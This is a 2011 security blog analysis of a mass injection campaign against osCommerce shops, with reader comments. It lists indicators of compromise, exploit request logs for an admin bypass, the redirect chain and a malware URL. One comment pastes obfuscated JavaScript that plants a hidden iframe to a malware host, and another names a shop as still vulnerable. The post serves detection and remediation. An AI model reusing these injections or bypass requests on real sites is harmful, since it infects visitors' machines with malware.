willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Crane Ku)
(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots

[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.

2. Injected iframe:
initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>

3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.

5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP

6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru

7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[2. Attack Timeline]

July 10th -- "Angel Injection" write about "osCommerce Remote Edit Site Info Vulnerability" (here, here).

July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com

July 23rd -- Attack launched injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
and later:
<script src=http://exero.eu/catalog/jquery.js></script>

July 24rd -- Initial writeup of this report, at the time there was only 90,000 infected pages:

July 31th -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:

Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages

Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.
[3. Source of Attack]

Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs should be located in Ukraine, and belongs to the ISP www.didan.com.ua.

The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.

[4. Vulnerabilities Targeted]

This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.

Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

[5. What Happens to Affected Websites]

1. The "Store Name" variable of osCommerce sites will be modified to inject one of the iframes below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. For certain websites the attacker also leaves at least one (sometimes more) backdoors, or "webshells". This happens more especially for shared hosting accounts where the backdoor allows for access to multiple accounts on the same server:

[6. Remediation]

Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.

1. Know if you've been infected.

1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

1.2 Search your site for the existence of two iframes:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)

2. Install an anti-virus program on the computer you use to manage your website.

3. Find and remove the injected backdoors.

4. Find and remove the injected iframes / javascripts

5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.

6. Change your website hosting and your osCommerce admin passwords

A very good article on how to secure osCommerce can be found here (thanks Markus):

http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

And the latest version of osCommerce can be downloaded here:

http://www.oscommerce.com/solutions/downloads

[7. Infection Details]

Here's the original youtube video we made of the entire infection process; at the time there were only 90,000 infected pages.

And here's the new one we made when there's over 6 million infected pages:

1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>

2. Browser loads http://willysy.com/images/banners/, redirected (302) to http://papucky.eu/ext/

3. Contents of papucky.eu/ext/ is here on pastebin, loads javascript from http://gooqlepics.com/include.js?in=864

4. javascript here on pastebin, decodes to this, generates iframe pointing to:

http://yandekapi.com/api?in=864

5. Contents of http://yandekapi.com/api?in=864 is here, redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV

6. Contents of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV is here, decodes to this. This includes multiple browser exploits.

7. After successful exploitation, browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot

[8. Screenshots]

Vulnerable osCommerce installations allows modification of the site's variables without admin access:

The infection attempt, when not successful, has the injected iframe rendered as content (rather than executed) in the title part of the website. Below are some examples:




49 comments:

Anonymous said...

Thank you very much for your information.
How do I fix this malware?

I have found some unusual *.php file in catalog/image and delete them all.

But it still keep changing my store name

Kafeine said...

Sorry for the trivial question.
What is the process monitor used in the screencast ?

With Sysinternals one or with Yet Another (remote) was not able to get this interessing window.

Anonymous said...

When I click this pastebin : http://pastebin.com/jAPCwSz8 ESET moans at me. Will the code contained in this pastebin execute just by clicking on the link? I wanted to see exactly what it does but I don't wanna get infected.

Anonymous said...

@Kafeine the process monitor is called process monitor. The title bar of the application gives it away.

Usually the titlebar of an application will tell you exactly what the app is.

Anonymous said...

@Kafeine The shortcut on the desktop is also an indication of what the program is called. It's literally called "process monitor."

Anonymous said...

WHere you find this Process Monitor ?


If you look for it you only find the Sysinternals one and Yet Another Remote Process Monitor (which icon is not far from this one)

starbuck3000 said...

Thank you for sharing your observations!

I am sorry for the potentialy dumb question but...do you have details on the infection process on the server-side? How was the iframe injected on the website?

Anonymous said...

My website is affected too. How to resolve this problem?

Henry said...

It looks like they somehow get access to database (most probably through the admin page) and modify the STORE_NAME key in configuration table. Remove the iframe code from the value and it's fixed.

Anonymous said...

Hi Henry, I kept removing that but the store name keep changing. No matter how many times I change my password....:-(

Anonymous said...

@Kafeine about the Process Monitor, look here:

http://www.brothersoft.com/process-monitor-163749.html

Kafeine said...

Many Thanks ! :)

Kafeine said...

Cleaner Link.
It's from BlueOrb
http://www.blueorbsoft.com/ProcessMonitor/index.html

Henry said...

In reference to removing iframe code from STORE_NAME configuration value. If you remove the code and it's coming back this could mean you're under active attack. I also noticed I had few strange administrator accounts that I know I didn't set up. Naturally removed them.

I suspect the attack somehow happens through the admin page so I blocked the access to the admin page entirely, with exception of specific IP addresses. This can be done with htaccess file inside the admin directory. For example adding below to htaccess file will block all access except from a specific IP address (this would be your IP, also this supports multiple “Allow from” definitions if you access admin page from more than one location like home and office).

Order deny,allow
Deny from all
Allow from YOUR_IP

This however will not work well when your IP address changes often but it's better than getting hacked. The best fix is probably to upgrade to the latest osCommerce release but it's not so easy in my case as I made tons of changes to original code to support what I needed. Take a look if interested
(podatekdochodowy.com or amigolife.com)

mjg said...

Cool sites. Looks like you have put a lot of effort into it

Anonymous said...

A simple question, how are these websites injected with this malicious code?

Anonymous said...

what does the update.exe do?

Anonymous said...

Hi henry, thanks for your suggestion. Have put in place a security check, hopefully it works...

Anonymous said...

And for those who use GNU / Linux is secure? or only affects the Windows platform?

greetings to all.

Alessandro simon.

Wayne Huang said...

Hi guys, there's been more than 1 million infected pages by now, and so we've updated the original post, adding to it the infection number (1,273,000), source IP of attack, log entries, osCommerce vulnerabilities used, and more. Thanks!

Rick said...

Good write up on this ongoing exploit. One thing though - if you are going to mask a URL in a screenshot - mask it in the browser tab too.

;-)

Anonymous said...

@Chris: it's nice that you grey out the URLs in your browser screenshots, but please grey out the URL in browser tab also ;) (have a look at your Chrome screenshot with file manager)

Anonymous said...

@Chris: also in your screenshot of vintagesleazes.com's admin panel of osCommerce. There is a mail address shown in screenshot. So it's not difficult to guess the shops URL. Please grey it out ;)

Anonymous said...

LOL. You forgot to anon the tab with the sites name in point 5.

Anonymous said...

New suspicious URL
hxxp://tiasissi[.]com[.]br/revendedores/jquery/>

Malcolm said...

Thanks for a great post.

I have a few follow up questions.

How does the virus find the osCommerce sites?

We have a lot of hackers coming back trying the same non-existant file in the admin folder. But it seems to be machines not real hackers. Maybe infected computers or servers. Is this the virus trying to find more osCommerce sites?

Thanks and keep up the good work!

Chameleon said...

The biggest problem we face is that companys want to run e-commerce sites on a shoe string. When we mention backups and updates they do not seem to care.

Slowly the more attacks that get highlighted the more people will listen.

This blog is excellent. Keep up the good work.

Anonymous said...

They're now obfuscating the code. Our website was just hit, and they appended this:

["script" tag here, removed as it was rejected by this comment box]ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);[end /script tag]
["script" tag here, removed as it was rejected by this comment box]wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);[end /script tag]


Which expands to http://zirycatum.com/k985ytv.htm
( zirycatum.com resolves to 178.17.163.92 )

Wayne Huang said...

Thanks! The incident involving that k985ytv.htm URL is documented here: http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html

Guest said...

3 different break-in attempts on my OSCommerce site (unsuccessful however on my site) from other IP's than listed above:
174.143.11.196
31.41.10.135
178.217.160.133

Wayne Huang said...

Thank you Chameleon!

Wayne Huang said...

Yes, there are several crawlers crawling for osCommerce sites on a regular basis. A fat list of known osCommerce sites can be downloaded easily and has been updated regularly. There's also a osCommerce defacer that takes this list as input and starts to deface osCommerce sites.

Wayne Huang said...

Thank you will correct it

Wayne Huang said...

Ha!

Wayne Huang said...

The malware infects only Windows machines. The injection will work on osCommerce installations regardless of the underlying operating system.

Wayne Huang said...

By leveraging osCommerce vulnerabilities mentioned in the post.

Wayne Huang said...

Indeed not easy to upgrade, and thanks for the info!

Wayne Huang said...

Yes this is the one. Simpler than the Process Monitor from SysInternals (MS) and therefore makes a better demo.

Wayne Huang said...

Best is to upgrade your osCommerce to the latest version

Wayne Huang said...

No, you won't get infected by visiting http://pastebin.com/jAPCwSz8
Many antivirus just do simple regex and therefore...

Wayne Huang said...

Best that you upgrade to the latest version of osCommerce.

Swiss Gaer Backpack said...

I am joyous to
hold this accruement rattling recyclable for me, as it contains lot of
message. I always advanced to demonstrate the valuation noesis and this event
I recovered in you communicator. Thanks for copulation

Environmental Remediation said...

awesome share. thank you very much.

George said...

The best fix I have found so far is with the addon called osC_Sec
http://addons.oscommerce.com/info/7834

Guest said...

http://vintagesleaze.com/admin/configuration.php

is still vulnerable!!!!!!

Rodrigo Valenzuela said...

hi, we're running OsCom 2.2 on Windows ISS server.... and being attacked several time in the alst 2 months... Any recomendation ?? orientation ??

thanks

Rodigo

glycoflex said...

This is a brilliant post, im really glad I found it thank you very much.
 

actos lawsuits said...

Very interesting article. I've always been interested in knowing more about this.
 

Bauchmuskeltraining said...

is still vulnerable!!!!!!

Post a Comment